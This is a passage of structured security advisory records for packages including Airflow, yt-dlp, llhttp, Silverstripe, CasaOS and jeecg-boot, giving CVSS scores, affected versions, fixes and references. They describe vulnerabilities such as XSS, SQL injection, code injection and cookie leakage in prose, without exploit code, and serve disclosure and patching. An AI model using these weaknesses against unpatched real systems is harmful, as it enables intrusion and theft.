[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36189'}, {'type': 'WEB', 'url': 'https://github.com/hwchase17/langchain/issues/5923'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/issues/5923'}, {'type': 'WEB', 'url': 'https://github.com/hwchase17/langchain/pull/6051'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/pull/8425'}, {'type': 'PACKAGE', 'url': 'https://github.com/hwchase17/langchain'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/langchain/PYSEC-2023-110.yaml'}]
{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T21:11:05Z', 'nvd_published_at': None}
1.4.0
GHSA-2rx4-9f5h-9gjf
2023-07-06T23:54:53Z
2023-07-06T21:15:06Z
null
['CVE-2023-33234']
Apache Airflow CNCF Kubernetes Provider: KubernetesPodOperator RCE via connection configuration
Arbitrary code execution in Apache Airflow CNCF Kubernetes provider version 5.0.0 allows user to change xcom sidecar image and resources via Airflow connection. In order to exploit this weakness, a user would already need elevated permissions (Op or Admin) to change the connection object in this manner. Operators should upgrade to provider version 7.0.0 which has removed the vulnerability.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-cncf-kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '7.0.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33234'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/n1vpgl6h2qsdm52o9m2tx1oo86tl4gnq'}]
{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T23:54:53Z', 'nvd_published_at': None}
1.4.0
GHSA-w2x5-hpmg-j98h
2023-07-06T21:49:53Z
2023-07-06T19:24:11Z
null
['CVE-2020-36665']
Artesãos SEOTools Open Redirect vulnerability
A vulnerability was found in Artesãos SEOTools up to and including version 0.17.1. This issue affects the function eachValue of the file TwitterCards.php. The manipulation of the argument value leads to open redirect. Upgrading to version 0.17.2 is able to address this issue. The name of the patch is ca27cd0edf917e0bc805227013859b8b5a1f01fb. It is recommended to upgrade the affected component.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'artesaos/seotools'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36665'}, {'type': 'WEB', 'url': 'https://github.com/artesaos/seotools/pull/201'}, {'type': 'WEB', 'url': 'https://github.com/artesaos/seotools/commit/ca27cd0edf917e0bc805227013859b8b5a1f01fb'}, {'type': 'PACKAGE', 'url': 'https://github.com/artesaos/seotools'}, {'type': 'WEB', 'url': 'https://github.com/artesaos/seotools/releases/tag/v0.17.2'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.222233'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.222233'}]
{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T21:49:53Z', 'nvd_published_at': '2023-03-04T19:15:00Z'}
1.4.0
GHSA-wp6c-29r3-jqw9
2023-08-03T19:37:03Z
2023-07-28T15:30:23Z
null
['CVE-2023-38992']
SQL injection in jeecg-boot
jeecg-boot v3.5.1 was discovered to contain a SQL injection vulnerability via the title parameter at /sys/dict/loadTreeData.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jeecgframework.boot:jeecg-boot-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38992'}, {'type': 'WEB', 'url': 'https://github.com/jeecgboot/jeecg-boot/issues/5173'}, {'type': 'WEB', 'url': 'https://github.com/jeecgboot/jeecg-boot/commit/648e66d5ef1547a01ff77bf9875f960ca39bbe8e'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeecgboot/jeecg-boot-starter'}]
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-28T20:55:29Z', 'nvd_published_at': None}
1.4.0
GHSA-grvq-vjqr-x8vm
2023-08-03T19:38:43Z
2023-07-28T15:30:23Z
null
['CVE-2023-39015']
Code injection in webmagic-core
webmagic-extension v0.9.0 and below was discovered to contain a code injection vulnerability via the component us.codecraft.webmagic.downloader.PhantomJSDownloader.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'us.codecraft:webmagic-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.9.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39015'}, {'type': 'WEB', 'url': 'https://github.com/code4craft/webmagic/issues/1122'}, {'type': 'PACKAGE', 'url': 'https://github.com/code4craft/webmagic'}]
{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-28T20:54:55Z', 'nvd_published_at': None}
1.4.0
GHSA-gm68-572p-q28r
2023-07-06T15:30:51Z
2023-07-06T15:30:51Z
null
[]
@vendure/admin-ui-plugin authenticated Cross-site Scripting vulnerability
### Impact Vendure provides an authorization system with different levels of privileges. For example, an administrator cannot create another administrator. In the admin UI, there are a couple of places with description inputs, such as inventory/collection catalog, shipping methods, promotions, and more. While the WYSIWYG editor allows limited customization, altering the request data (not in the ui) saves and returns arbitrary HTML with no sanitization. Causing an XSS when viewing the page. The impact of this XSS is privilege escalation. A user that can write any type of description can trigger the attack. Then any other user that visits the vulnerable page is prone to arbitrary Javascript code execution, giving the attacker ability to execute actions on behalf of this user. ### Patches in progress ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ ### References _Are there any links users can visit to find out more?_
[]
[{'package': {'ecosystem': 'npm', 'name': '@vendure/admin-ui-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.3'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/vendure-ecommerce/vendure/security/advisories/GHSA-gm68-572p-q28r'}, {'type': 'WEB', 'url': 'https://github.com/vendure-ecommerce/vendure/commit/0cdc92b241e6fd4017ddfc9fbdca189fc7c1ada0'}, {'type': 'PACKAGE', 'url': 'https://github.com/vendure-ecommerce/vendure'}, {'type': 'WEB', 'url': 'https://github.com/vendure-ecommerce/vendure/blob/master/CHANGELOG.md#203-2023-07-04'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T15:30:51Z', 'nvd_published_at': None}
1.4.0
GHSA-jpgw-2r9m-8qfw
2023-07-05T22:40:59Z
2023-07-05T22:40:59Z
null
['CVE-2023-36809']
Kiwi TCMS's misconfigured HTTP headers allow stored XSS execution with Firefox
### Impact Kiwi TCMS allows users to upload attachments to test plans, test cases, etc. Earlier versions of Kiwi TCMS had introduced changes which were meant to serve all uploaded files as plain text in order to prevent browsers from executing potentially dangerous files when such files are accessed directly! The previous Nginx configuration was incorrect allowing certain browsers like Firefox to ignore the `Content-Type: text/plain` header on some occasions thus allowing potentially dangerous scripts to be executed. Additionally file upload validators and parts of the HTML rendering code have been found to require additional sanitation and improvements. ### Patches - Updated Nginx content type configuration - Improved file upload validation code to prevent more potentially dangerous uploads - Sanitization of test plan names used in the `tree_view_html()` function ### References Disclosed by [M Nadeem Qazi](https://huntr.dev/bounties/511489dd-ba38-4806-9029-b28ab2830aa8/) and [Mahshooq Zubair](https://huntr.dev/bounties/c6eeb346-fa99-4d41-bc40-b68f8d689223/).
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'kiwitcms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.5'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/kiwitcms/Kiwi/security/advisories/GHSA-jpgw-2r9m-8qfw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36809'}, {'type': 'WEB', 'url': 'https://github.com/kiwitcms/kiwi/commit/195ea53eaaf360c19227c864cc0fe58910032c3c'}, {'type': 'WEB', 'url': 'https://github.com/kiwitcms/kiwi/commit/ffb00450be52fe11a82a2507632c2328cae4ec9d'}, {'type': 'PACKAGE', 'url': 'https://github.com/kiwitcms/Kiwi'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/511489dd-ba38-4806-9029-b28ab2830aa8/'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c6eeb346-fa99-4d41-bc40-b68f8d689223/'}, {'type': 'WEB', 'url': 'https://kiwitcms.org/blog/kiwi-tcms-team/2023/07/04/kiwi-tcms-125/'}, {'type': 'WEB', 'url': 'https://www.github.com/kiwitcms/kiwi/commit/195ea53eaaf360c19227c864cc0fe58910032c3c'}, {'type': 'WEB', 'url': 'https://www.github.com/kiwitcms/kiwi/commit/ffb00450be52fe11a82a2507632c2328cae4ec9d'}]
{'cwe_ids': ['CWE-434', 'CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-05T22:40:59Z', 'nvd_published_at': None}
1.4.0
GHSA-v8mc-9377-rwjj
2023-07-06T19:47:40Z
2023-07-06T19:47:40Z
null
['CVE-2023-35934']
yt-dlp File Downloader cookie leak
### Impact During file downloads, yt-dlp or the external downloaders that yt-dlp employs may leak cookies on HTTP redirects to a different host, or leak them when the host for download fragments differs from their parent manifest's host. This vulnerable behavior is present in all versions of [youtube-dl](https://github.com/ytdl-org/youtube-dl), [youtube-dlc](https://github.com/blackjack4494/yt-dlc) and [yt-dlp](https://github.com/yt-dlp/yt-dlp) released since 2015.01.25. All native and external downloaders are affected, except for `curl` and `httpie` (httpie version 3.1.0 or later). At the file download stage, all cookies are passed by yt-dlp to the file downloader as a `Cookie` header, thereby losing their scope. This also occurs in yt-dlp's info JSON output, which may be used by external tools. As a result, the downloader or external tool may indiscriminately send cookies with requests to domains or paths for which the cookies are not scoped. An example of a potential attack scenario exploiting this vulnerability: 1. an attacker has crafted a malicious website with an embedded URL designed to be detected by yt-dlp as a video download. This embedded URL has the domain of a trusted site that the user has loaded cookies for, and conducts an [unvalidated redirect](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html) to a target URL. 2. yt-dlp extracts this URL and calculates a `Cookie` header based on its domain for the file downloader to make its request(s) with. 3. the download URL redirects to a server controlled by the attacker, to which yt-dlp forwards the user's sensitive cookie information. ### Patches yt-dlp version 2023.07.06 fixes this issue by doing the following: - Remove the `Cookie` header upon HTTP redirects - Have native downloaders calculate their own `Cookie` header from the cookiejar - Utilize external downloaders' built-in support for cookies instead of passing them as header arguments - If the external downloader does not have proper cookie support, then disable HTTP redirection (`axel` only) - Process cookies passed as HTTP headers to limit their scope (`--add-header "Cookie:..."` is scoped to input URL domain only) - Store cookies in a separate `cookies` field of the info dict instead of `http_headers` so as not to lose their scope Patches for youtube-dl are expected and we will update this advisory when they are merged. ### Workarounds It is recommended to upgrade yt-dlp to version 2023.07.06 as soon as possible. For users who are not able to upgrade: - Avoid using cookies and user authentication methods (`--cookies`, `--cookies-from-browser`, `--username`, `--password`, `--netrc`). While extractors may set custom cookies, these usually do not contain sensitive information. - Avoid using `--load-info-json` Or, if authentication is a must: - Verify the integrity of download links from unknown sources in browser (including redirects) before passing them to yt-dlp - Use `curl` as external downloader, since it is not impacted (`--downloader curl`) - Avoid fragmented formats such as HLS/m3u8, DASH/mpd and ISM (use `-f "(bv*+ba/b)[protocol~='^https?$']"`) ### References - https://github.com/yt-dlp/yt-dlp/security/advisories/GHSA-v8mc-9377-rwjj - https://nvd.nist.gov/vuln/detail/CVE-2023-35934 - https://github.com/yt-dlp/yt-dlp/releases/tag/2023.07.06 - https://github.com/yt-dlp/yt-dlp-nightly-builds/releases/tag/2023.07.06.185519 - https://github.com/yt-dlp/yt-dlp/commit/1ceb657bdd254ad961489e5060f2ccc7d556b729 - https://github.com/yt-dlp/yt-dlp/commit/f8b4bcc0a791274223723488bfbfc23ea3276641 - https://github.com/yt-dlp/yt-dlp/commit/3121512228487c9c690d3d39bfd2579addf96e07
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'yt-dlp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2023.7.06'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/yt-dlp/yt-dlp/security/advisories/GHSA-v8mc-9377-rwjj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35934'}, {'type': 'WEB', 'url': 'https://github.com/yt-dlp/yt-dlp/commit/1ceb657bdd254ad961489e5060f2ccc7d556b729'}, {'type': 'WEB', 'url': 'https://github.com/yt-dlp/yt-dlp/commit/3121512228487c9c690d3d39bfd2579addf96e07'}, {'type': 'WEB', 'url': 'https://github.com/yt-dlp/yt-dlp/commit/f8b4bcc0a791274223723488bfbfc23ea3276641'}, {'type': 'PACKAGE', 'url': 'https://github.com/yt-dlp/yt-dlp'}, {'type': 'WEB', 'url': 'https://github.com/yt-dlp/yt-dlp-nightly-builds/releases/tag/2023.07.06.185519'}, {'type': 'WEB', 'url': 'https://github.com/yt-dlp/yt-dlp/releases/tag/2023.07.06'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5X6YT6AQE5FHM5VTQLKKJXSYBLLJF26W/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HEOKCGVONGHR2SYUIXU33A4MKXZBDP6L/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IM44RJL2MR2WG3ZY354C5IUEEZUJGEVA/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M7E7CQ5S5KMZHAMCNU7V7KYNBVCPLBHG/'}]
{'cwe_ids': ['CWE-200', 'CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T19:47:40Z', 'nvd_published_at': None}
1.4.0
GHSA-cggh-pq45-6h9x
2023-07-11T22:45:02Z
2023-07-01T00:30:46Z
null
['CVE-2023-30589']
llhttp vulnerable to HTTP request smuggling
The llhttp parser in the http module in Node v20.2.0 does not strictly use the CRLF sequence to delimit HTTP requests. This can lead to HTTP Request Smuggling (HRS). The CR character (without LF) is sufficient to delimit HTTP header fields in the llhttp parser. According to RFC7230 section 3, only the CRLF sequence should delimit each header-field. This impacts all Node.js active versions: v16, v18, and, v20
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'llhttp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30589'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/2001873'}, {'type': 'PACKAGE', 'url': 'https://github.com/nodejs/llhttp'}, {'type': 'WEB', 'url': 'https://github.com/nodejs/llhttp/releases/tag/release%2Fv8.1.1'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HMEELCREWMRT6NS7HWXLA6XFLLMO36HE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IV326O2X4BE3SINX5FJHMAKVHUAA4ZYF/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UEJWL67XR67JAGEL2ZK22NA3BRKNMZNY/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCVG4TQRGTK4LKAZKVEQAUEJM7DUACYE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VEEQIN5242K5NBE2CZ4DYTNA5B4YTYE5/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VKFMKD4MJZIKFQJAAJ4VZ2FHIJ764A76/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230803-0009/'}]
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-11T22:45:02Z', 'nvd_published_at': None}
1.4.0
GHSA-4q66-g4mm-8rg5
2023-07-31T22:02:35Z
2023-07-31T22:02:35Z
null
[]
Silverstripe has Cross-site Scripting (XSS) vulnerabilities inherited from TinyMCE
TinyMCE 4.x is vulnerable to several XSS vectors, which had been patched in later versions. Two of these have been identified as affecting `silverstripe/admin`. Only Silverstripe CMS 4 is affected by this issue. It's not possible to upgrade Silverstripe CMS 4 to use a more recent release of TinyMCE without introducing breaking changes. Instead, the security patches that shipped in later releases of TinyMCE have been backported to the TinyMCE version bundled in `silverstripe/admin`. Silverstripe CMS 5 is not affected by those vulnerabilities because it uses TinyMCE 6. You can find more information about the underlying vulnerabilities in those GitHub security advisories: - [GHSA-5h9g-x5rv-25wg Cross-site scripting vulnerability in TinyMCE](https://github.com/advisories/GHSA-5h9g-x5rv-25wg) - [GHSA-w7jx-j77m-wp65 Cross-site scripting vulnerability in TinyMCE](https://github.com/advisories/GHSA-w7jx-j77m-wp65)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/admin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.6'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-admin/security/advisories/GHSA-4q66-g4mm-8rg5'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-admin/commit/cafc1c4de58f1553b019dc2f8a62f835cabdbeb2'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-5h9g-x5rv-25wg'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-w7jx-j77m-wp65'}, {'type': 'PACKAGE', 'url': 'https://github.com/silverstripe/silverstripe-admin'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-31T22:02:35Z', 'nvd_published_at': None}
1.4.0
GHSA-q9w4-w667-qqj4
2023-07-21T17:59:43Z
2023-07-10T21:54:03Z
null
['CVE-2023-37905']
ckeditor-wordcount-plugin vulnerable to Cross-site Scripting in Source Mode of Editor
### Problem It has been discovered that the `ckeditor-wordcount-plugin` plugin for CKEditor4 is susceptible to cross-site scripting when switching to the source code mode. ### Solution Update to version 1.17.12 of the `ckeditor-wordcount-plugin` plugin. ### Credits * @sypets for reporting this finding to the TYPO3 Security Team * @ohader for fixing the issue on behalf of the TYPO3 Security Team
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'ckeditor-wordcount-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.17.12'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.17.11'}}]
[{'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/security/advisories/GHSA-m8fw-p3cr-6jqc'}, {'type': 'WEB', 'url': 'https://github.com/w8tcha/CKEditor-WordCount-Plugin/security/advisories/GHSA-q9w4-w667-qqj4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37905'}, {'type': 'WEB', 'url': 'https://github.com/w8tcha/CKEditor-WordCount-Plugin/commit/0f03b3e5b7c1409998a13aba3a95396e6fa349d8'}, {'type': 'WEB', 'url': 'https://github.com/w8tcha/CKEditor-WordCount-Plugin/commit/a4b154bdf35b3465320136fcb078f196b437c2f1'}, {'type': 'PACKAGE', 'url': 'https://github.com/w8tcha/CKEditor-WordCount-Plugin'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2023-004'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-10T21:54:03Z', 'nvd_published_at': None}
1.4.0
GHSA-36xx-7vf6-7mv3
2023-08-23T19:40:25Z
2023-07-31T22:00:58Z
null
['CVE-2023-32302']
Silverstripe Framework: Members with no password can be created and bypass custom login forms
When a new `Member` record was created in the cms it was possible to set a blank password. If an attacker knows the email address of the user with the blank password then they can attempt to log in using an empty password. The default member authenticator, login form and basic auth all require a non-empty password, however if a custom authentication method is used it may allow a successful login with the empty password. Starting with this release, blank passwords are no no longer allowed when members are created in the CMS. Programatically created `Member` records, such as those used in unit tests, still allow blank passwords. You may have some `Member` records in your system already which have empty passwords. To detect these, you can loop over all `Member` records with `Member::get()` and pass each record into the below method. It might be sensible to create a [`BuildTask`](https://api.silverstripe.org/5/SilverStripe/Dev/BuildTask.html) for this purpose. ```php private function memberHasBlankPassword(Member $member): bool { // skip default admin as this is created programatically if ($member->isDefaultAdmin()) { return false; } // return true if a blank password is valid for this member $authenticator = new MemberAuthenticator(); return $authenticator->checkPassword($member, '')->isValid(); } ``` Once you have identified the records with empty passwords, it's up to you how to handle this. The most sensible way to resolve this is probably to generate a new secure password for each of these members, mark it as immediately expired, and email each affected member (assuming they have a valid email address in the system). Users would need to opt-in to insecure behavior by using a configuration which allowed for empty passwords. These configurations are not expected and hence this advisory is primarily informational in nature. Reported by: [Sabina Talipova](https://www.silverstripe.com/about-us/team/?member=sabina-talipova) from Silverstripe and [Christian Bünte](https://github.com/bimthebam)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/framework'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '4.13.14'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/framework'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.13'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-framework/security/advisories/GHSA-36xx-7vf6-7mv3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32302'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-framework/commit/7b21b38ac4532d06565dfcefad50540ebd2b50f4'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2023-32302.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/silverstripe/silverstripe-framework'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-framework/releases/tag/4.13.14'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-framework/releases/tag/5.0.13'}, {'type': 'WEB', 'url': 'https://www.silverstripe.org/download/security-releases/CVE-2023-32302'}]
{'cwe_ids': ['CWE-20', 'CWE-862'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-07-31T22:00:58Z', 'nvd_published_at': None}
1.4.0
GHSA-m8fw-p3cr-6jqc
2023-07-26T22:57:41Z
2023-07-25T19:11:43Z
null
[]
Cross-Site Scripting in CKEditor4 WordCount Plugin
> ### CVSS: `CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C` (4.4) ### Problem The [WordCount](https://ckeditor.com/cke4/addon/wordcount) plugin ([`npm:ckeditor-wordcount-plugin`](https://www.npmjs.com/package/ckeditor-wordcount-plugin)) for CKEditor4 is vulnerable to cross-site scripting when switching to the source code mode. This plugin is enabled via the `Full.yaml` configuration present, but is not active in the default configuration. In default scenarios, exploiting this vulnerability requires a valid backend user account. However, if custom plugins are used on the website frontend, which accept and reflect rich-text content submitted by users, no authentication is required. ### Solution Update to TYPO3 versions 9.5.42 ELTS, 10.4.39 ELTS, 11.5.30 that fix the problem described above. ### Credits Thanks to Sybille Peters who reported this issue, and to TYPO3 core & security team member Oliver Hader who fixed the issue. ### References * [TYPO3-CORE-SA-2023-004](https://typo3.org/security/advisory/typo3-core-sa-2023-004) * https://github.com/w8tcha/CKEditor-WordCount-Plugin/security/advisories/GHSA-q9w4-w667-qqj4
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-rte-ckeditor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.5.0'}, {'fixed': '9.5.42'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-rte-ckeditor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.39'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-rte-ckeditor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.5.30'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/security/advisories/GHSA-m8fw-p3cr-6jqc'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/typo3'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2023-004'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T19:11:43Z', 'nvd_published_at': None}
1.4.0
GHSA-m5q5-8mfw-p2hr
2023-07-17T14:40:16Z
2023-07-17T14:40:16Z
null
['CVE-2023-37266']
CasaOS contains weak JWT secrets
### Impact Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. ### Patches The problem was addressed by improving the validation of JWTs in 705bf1f. This patch is part of CasaOS 0.4.4. ### Workarounds Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly. ### References - 705bf1f
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/IceWhaleTech/CasaOS'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.4'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/IceWhaleTech/CasaOS/security/advisories/GHSA-m5q5-8mfw-p2hr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37266'}, {'type': 'WEB', 'url': 'https://github.com/IceWhaleTech/CasaOS/commit/705bf1facbffd2ca40b159b0303132b6fdf657ad'}, {'type': 'PACKAGE', 'url': 'https://github.com/IceWhaleTech/CasaOS'}]
{'cwe_ids': ['CWE-1391', 'CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-17T14:40:16Z', 'nvd_published_at': None}
1.4.0
GHSA-99p5-qpqx-mhwc
2023-08-03T19:37:28Z
2023-07-28T15:30:23Z
null
['CVE-2023-39010']
Code injection in BoofCV
BoofCV 0.42 was discovered to contain a code injection vulnerability via the component boofcv.io.calibration.CalibrationIO.load. This vulnerability is exploited by loading a crafted camera calibration file.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.boofcv:boofcv-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.43.1'}]}]}]
